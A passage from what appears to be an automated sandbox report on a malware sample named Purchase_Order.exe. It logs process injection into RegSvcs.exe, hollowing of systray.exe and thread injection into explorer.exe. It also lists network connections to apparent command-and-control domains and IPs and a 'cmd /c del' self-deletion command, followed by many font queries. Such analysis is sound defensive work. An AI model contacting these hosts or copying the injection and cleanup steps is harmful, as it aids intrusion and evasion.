            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F98E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05021608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0501FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0502AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F78794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F7EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_0501FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_05038ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04F8B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Purchase_Order.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
            Source: C:\Windows\explorer.exeDomain query: www.trainup-wall.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.155.26 80
            Source: C:\Windows\explorer.exeDomain query: www.flockuplabs.com
            Source: C:\Windows\explorer.exeDomain query: www.paolograssino.com
            Source: C:\Windows\explorer.exeNetwork Connect: 45.140.167.161 80
            Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exeDomain query: www.toolbnbapp.com
            Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.69 80
            Source: C:\Windows\explorer.exeDomain query: www.a-prime-india-demataccount.zone
            Source: C:\Windows\explorer.exeNetwork Connect: 151.101.0.119 80
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.64.212 80
            Source: C:\Windows\explorer.exeDomain query: www.gorditasdemaiz.com
            Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.127 80
            Source: C:\Windows\explorer.exeDomain query: www.cgjanvier.com
            Source: C:\Windows\explorer.exeDomain query: www.prltoday.com
            Source: C:\Windows\explorer.exeNetwork Connect: 160.16.235.37 80
            Source: C:\Windows\explorer.exeDomain query: www.culturalinterface.net
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.mexicobeachselfstorage.com
            Source: C:\Windows\explorer.exeDomain query: www.tylerrucarean.com
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\Purchase_Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3292
            Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3292
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 13B0000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Purchase_Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Purchase_Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Purchase_Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BEF008
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
            Source: explorer.exe, 00000007.00000000.282403163.0000000005F40000.00000004.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.263828390.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Users\user\Desktop\Purchase_Order.exe VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
